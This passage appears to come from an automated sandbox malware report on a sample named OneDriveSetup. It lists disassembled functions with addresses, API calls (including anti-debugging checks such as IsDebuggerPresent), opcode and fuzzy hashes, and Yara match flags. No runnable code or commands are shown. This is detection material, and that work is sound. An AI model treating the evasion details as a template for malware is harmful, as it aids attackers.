                                                                                                                                                                        • Instruction ID: ccd50716bbc5e4c1b4f01b97a0672f31d8282521293ce907bddf089cf8a64f6a
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f90ad42fc2ddbad876359ce1b75cd19496d8034c4cd49cc4dad0e24cf58eb74
                                                                                                                                                                        • Instruction Fuzzy Hash: A8E0D8B584E344EFEB12DB78E440AE97FB4FB96301F10019DC00593552D6300915CB51
                                                                                                                                                                        Function 08512DB8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cd92c72fa679c52b686730187f8b3f287112421a58d13100fe2d99ce291f147a
                                                                                                                                                                        • Instruction ID: 93d6e403f11859ead7b999f344d799f71d485f1bdd9180bbe6f20b9f37bf70d8
                                                                                                                                                                        • Opcode Fuzzy Hash: cd92c72fa679c52b686730187f8b3f287112421a58d13100fe2d99ce291f147a
                                                                                                                                                                        • Instruction Fuzzy Hash: D6E0DF72D202668BCB11A7A0AC404DEBF35EEA2161F024A92D8106B240FA201A1A87E2
                                                                                                                                                                        Function 08516C47 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1f1a51ef4fc10b8b0c5b4579e1e7250f5f4b5a2df1b5c2eb5571e178fd31f493
                                                                                                                                                                        • Instruction ID: 21f3f367303b86790ac226e1ad2c28f276dd6755efb62c98e02016e0064e9a9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f1a51ef4fc10b8b0c5b4579e1e7250f5f4b5a2df1b5c2eb5571e178fd31f493
                                                                                                                                                                        • Instruction Fuzzy Hash: 52E026300183408FDB12DF74EC908A83FE1FDD0616B004568D0044B122C7A0544A8B22
                                                                                                                                                                        Function 08512DC8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9c5430c335e4e8594d2601e69bfab842863952d3597d8b04c0154305049a1150
                                                                                                                                                                        • Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c5430c335e4e8594d2601e69bfab842863952d3597d8b04c0154305049a1150
                                                                                                                                                                        • Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1
                                                                                                                                                                        Function 08519410 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                        • Instruction ID: 78c65c1a50db15ef3106dd0c804f42a795f4761df7bb3f5eed8dfaaaff0f1ebe
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                        • Instruction Fuzzy Hash: B2C08C3720C1286BBA24108FBC80EA3BF8CF3C12F6B66013BF51CD32009882AC8101F4
                                                                                                                                                                        Function 0851DC1F Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 49d3ce75db529a611d5bef4263b4f7bdfa7a258e1584089fa3ec9be3f06ab191
                                                                                                                                                                        • Instruction ID: 34388e9215d20f25e1ee4a3c20c2ce8f344092b8e29822462f150de0a4fc5ff8
                                                                                                                                                                        • Opcode Fuzzy Hash: 49d3ce75db529a611d5bef4263b4f7bdfa7a258e1584089fa3ec9be3f06ab191
                                                                                                                                                                        • Instruction Fuzzy Hash: 53D04235E0410DDBDF30EFA8E4489DDBFB0FB88216B10542AE925A3611DA3058558F11
                                                                                                                                                                        Function 0851B4BD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0e3610d0f09581ce7096f979529a792dd815235738d4594567022ee01dcf8863
                                                                                                                                                                        • Instruction ID: c8bd4eda8e0a01ff9744011b489ceb8a7afd788e6cc2f0dd6653d95cf40d4a36
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e3610d0f09581ce7096f979529a792dd815235738d4594567022ee01dcf8863
                                                                                                                                                                        • Instruction Fuzzy Hash: ADD0673AB110089FCB149F99E8909DDB7B6FB9C221B048116E915A3261C6319921DB60
                                                                                                                                                                        Function 08516C58 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9c5667e4909bfcf1d295ab3e7de8acf4de6d801503fc54efac20b38d97fda87b
                                                                                                                                                                        • Instruction ID: 5a41b5d18fd95077dffaef2d4704de971fed9d2fab6b4d34f83cc5a9d21fadac
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c5667e4909bfcf1d295ab3e7de8acf4de6d801503fc54efac20b38d97fda87b
                                                                                                                                                                        • Instruction Fuzzy Hash: DFC012301147594BD511FB75ED54975371AB6C09127408514A5090B249DFF4584547A7

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                        Function 00408C60 Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$@
                                                                                                                                                                        • API String ID: 0-149943524
                                                                                                                                                                        • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                        • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                                                        • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                                        • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                                                        Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                        Function 0C418BC0 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: "
                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                        • Opcode ID: 39c31392a258f733886f41a6d8f7dbc4e44027cf3ead56d28137b127d1e1d36a
                                                                                                                                                                        • Instruction ID: 6c466f585826197dfd3264e3262aefce418878c3d6fe9383506101849d21aa97
                                                                                                                                                                        • Opcode Fuzzy Hash: 39c31392a258f733886f41a6d8f7dbc4e44027cf3ead56d28137b127d1e1d36a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6BF10475E002588FEB14CFA9C484B9EBBF2BF84314F24C16AD848AB395D7759986CF50
                                                                                                                                                                        Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                                        Function 00407C3F Relevance: .8, Instructions: 783COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                        • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                                                                                                                        • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                                                                                                                        Function 004073A0 Relevance: .6, Instructions: 633COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                        • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                                                        • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                                                        Function 0C410040 Relevance: .6, Instructions: 598COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8019b8b866f7444a03272582fd273dc929139e47e1ac2e681ad68ee3ba6d917d
                                                                                                                                                                        • Instruction ID: d62b0c14b613d1592230cdc7f7676551fad1597d4e9cd8b6ade10ba9b2e30850
                                                                                                                                                                        • Opcode Fuzzy Hash: 8019b8b866f7444a03272582fd273dc929139e47e1ac2e681ad68ee3ba6d917d
                                                                                                                                                                        • Instruction Fuzzy Hash: F9529974E01228CFDB64DF69C984B9DBBB2BB89301F5081EAD849A7350DB359E81CF51
                                                                                                                                                                        Function 00406CA0 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                        • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                                                                                                                        • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                                                                                                                        • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                                                                                                                        Function 0C41F840 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7e0c5c3ff4b98703ced677582e3ac8a8a8a30f031d0c61373e9c4c0dde000426
                                                                                                                                                                        • Instruction ID: b941d8ace1db5340169418220ec608ae800642e3a09ca2a13ccf43dee3866304
                                                                                                                                                                        • Opcode Fuzzy Hash: 7e0c5c3ff4b98703ced677582e3ac8a8a8a30f031d0c61373e9c4c0dde000426
                                                                                                                                                                        • Instruction Fuzzy Hash: D0C1C374E01218CFEB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB355E86CF51
                                                                                                                                                                        Function 0C41CCD0 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2e2d22f087d81a691f08533ee5a14fd11d159392cc0568b3436f525540b0a02f
                                                                                                                                                                        • Instruction ID: c7d7a52b603ea834ce5cfe91bb0cc16238f988997d61a3f91017e010c5841cbd
                                                                                                                                                                        • Opcode Fuzzy Hash: 2e2d22f087d81a691f08533ee5a14fd11d159392cc0568b3436f525540b0a02f
                                                                                                                                                                        • Instruction Fuzzy Hash: D1C1D274E01218CFDB14DFA5C984B9DBBB2BF89300F6081AAD809AB354DB359E85CF51
                                                                                                                                                                        Function 0C41D128 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1f752428b61d576bbd9480aa64f8b389a30db488ba6ec9c9203b8ed512c46323
                                                                                                                                                                        • Instruction ID: 7583d336e48f3f9148c15d8dbf06e0137176b2314e68bc8356d39560947bd754
                                                                                                                                                                        • Opcode Fuzzy Hash: 1f752428b61d576bbd9480aa64f8b389a30db488ba6ec9c9203b8ed512c46323
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C1D274E01258CFDB14DFA5C984B9DBBB2BF89300F6081AAD809AB354DB359E85CF51
                                                                                                                                                                        Function 0C41D580 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f8a1f22cecc773010dc50f0e871d37474bddb45e837b86c22adfc31826b5eafc
                                                                                                                                                                        • Instruction ID: 6cd3b3763340d1d6e3fa6a63d8be407fc9a3b42528c9163ebee8d4c2289fc848
                                                                                                                                                                        • Opcode Fuzzy Hash: f8a1f22cecc773010dc50f0e871d37474bddb45e837b86c22adfc31826b5eafc
                                                                                                                                                                        • Instruction Fuzzy Hash: 05C1C174E01218CFDB14DFA5C984B9DBBB2BF89300F6081AAD809AB354DB359E85CF51
                                                                                                                                                                        Function 0C41E6E0 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2058094e2af66ac3342a09a3e091d3ee7f8adc02345129e5d1879cebee2a28ce
                                                                                                                                                                        • Instruction ID: 6602fd8e28c921a7bba007fb3b4e0eb3e5424ff9ad285edc3b1d69d6979122c5
                                                                                                                                                                        • Opcode Fuzzy Hash: 2058094e2af66ac3342a09a3e091d3ee7f8adc02345129e5d1879cebee2a28ce
                                                                                                                                                                        • Instruction Fuzzy Hash: 47C1B278E01218CFDB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Function 0C41E288 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e66a90b356deed7542e0de69afc809b1d8027c7d5fd64ea21ccf709443088102
                                                                                                                                                                        • Instruction ID: d8c286663e9374f92bd3136d7f5a2a474905f2170570c362a3d4dda25a075457
                                                                                                                                                                        • Opcode Fuzzy Hash: e66a90b356deed7542e0de69afc809b1d8027c7d5fd64ea21ccf709443088102
                                                                                                                                                                        • Instruction Fuzzy Hash: 92C1C378E01218CFDB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Function 0C41EB38 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 48c6f2e34713121967834c161c2b0d2e3a06ccc3fe10ab81fbfb9183dc6f1419
                                                                                                                                                                        • Instruction ID: 48de026f5c8026411812ccf884390eacf7f4b9ff32a1dfc974c60bd8ef88f5c2
                                                                                                                                                                        • Opcode Fuzzy Hash: 48c6f2e34713121967834c161c2b0d2e3a06ccc3fe10ab81fbfb9183dc6f1419
                                                                                                                                                                        • Instruction Fuzzy Hash: 24C1B378E01218CFDB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Function 0C41F3E8 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
